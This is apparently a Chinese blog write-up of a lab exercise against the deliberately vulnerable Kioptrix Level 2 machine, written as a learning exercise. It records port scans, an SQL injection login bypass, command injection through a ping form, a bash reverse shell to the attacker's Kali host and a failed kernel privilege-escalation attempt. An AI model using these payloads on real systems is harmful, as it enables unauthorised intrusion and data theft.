kioptrix-level-2(命令执行漏洞)
kioptrix :192.168.1.117 kali linux :192.168.1.111
上一篇 --
开放端口:22(ssh),80(http),111(rpcbind),443(https),616(sco-sysmgr),631(ipp),3306(mysql)
后续探测:use scanner/ssh/ssh_version (metasploit 扫描)
[*] 192.168.1.117:22 SSH server version:
SSH-1.99-OpenSSH_3.9p1 ( service.version=3.9p1
service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH
)
版本OpenSSH 3.9p1,暴力破解登陆失败
探测二:use auxiliary/scanner/mysql/mysql_login
192.168.1.117:3306 MYSQL - Unsupported target version of MySQL
detected. Skipping.
不支持目标mysql的版本
探测三:use auxiliary/scanner/mysql/mysql_version
192.168.1.117:3306 is running MySQL, but responds with an error:
\x04Host '192.168.1.111' is not allowed to connect to this MySQL
server
192.168.1.111是kali的ip,不被允许连接mysql服务器
探测四:浏览器打开 http://192.168.1.117
显示 http://192.168.1.117/index.php
::: {.image-package}
\
::: {.image-caption}
:::
:::
随便输入了一些字符,错误的话直接跳转回上面页面。输入单引号没反应。
输入 admin'or'1'='1,密码随意。如果你不会click
here
::: {.image-package}
\
::: {.image-caption}
:::
:::
基本管理员web控制台,这社么玩意儿?
输入192.168.1.1,点submit
::: {.image-package}
\
::: {.image-caption}
:::
:::
输入正确网段内ip,就执行ping操作;输入错误网段ip,依然执行,不过显示目标主机不可达
输入任意字符,不响应,直接在网页返回你输入的字符。
……
……
……
我真是傻了,能用sql语句进入,说明后台有数据库有sql注入嘛,直接用sqlmap啊
en…… 但是好像没有注入点id=x,sql不精通啊,算了
探测五:https://192.168.1.117
显示”192.168.1.117
的网站管理员未正确配置网站。为避免您的信息被窃,Firefox
没有与该网站建立连接。”
仍然继续,click
e……还是那个操蛋的页面,进去看了看,和80端口提供的一样。
如何你能够幸运地找到命令行执行漏洞,很快你可能会想要一个交互式的shell。
如果不可能添加一个新的用户/ssh
key/.rhosts文件,并登入,你下一步可能是扔回一个反弹shell或者绑定一个shell到TCP端口。你能够创建反弹shell取决于目标系统上安装的脚本语言——虽然你也可以上传一个二进制程序,如果你有了很好的准备的话。
下面的例子为unix-like系统定制。一些例子同样能够在windows下运行,如果你使用cmd.exe和’/bin/sh
-i’……
\
看完这篇文章,发现自己对于shell and shell script的掌握还显不够。
192.168.1.1;cat etc/passwd/
输入这个命令,分号使得后面显示密码文件的命令顺便也执行了。
::: {.image-package}
\
::: {.image-caption}
账号管理
:::
:::
nc -l -p 888 kali上执行netcat,监听本地888端口
192.168.1.1;bash -i >& /dev/tcp/192.168.1.111/888 0>&1
反弹shell到kali888端口
::: {.image-package}
\
::: {.image-caption}
成功啦
:::
:::
uname -a
Linux kioptrix.level2 ***2.6.9-***55.EL #1 Wed May 2 13:52:16 EDT
2007 i686 i686 i386 GNU/Linux
搜索到一个特权用户提权漏洞 ,版本是:Linux
Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6
x86)
::: {.image-package}
\
::: {.image-caption}
:::
:::
::: {.image-package}
\
::: {.image-caption}
:::
:::
于是内网就可以通过浏览器访问攻击机4300端口,下载hole.c文件。
cannot write to hole.c ?明明都200 ok了,为什么!为什么!
为什么是can't write ,wget不是下载命令吗,怎么会拒绝写入,是什么鬼
::: {.image-package}
\
::: {.image-caption}
:::
:::
好了,提权失败了。
后续
:::
:::
:::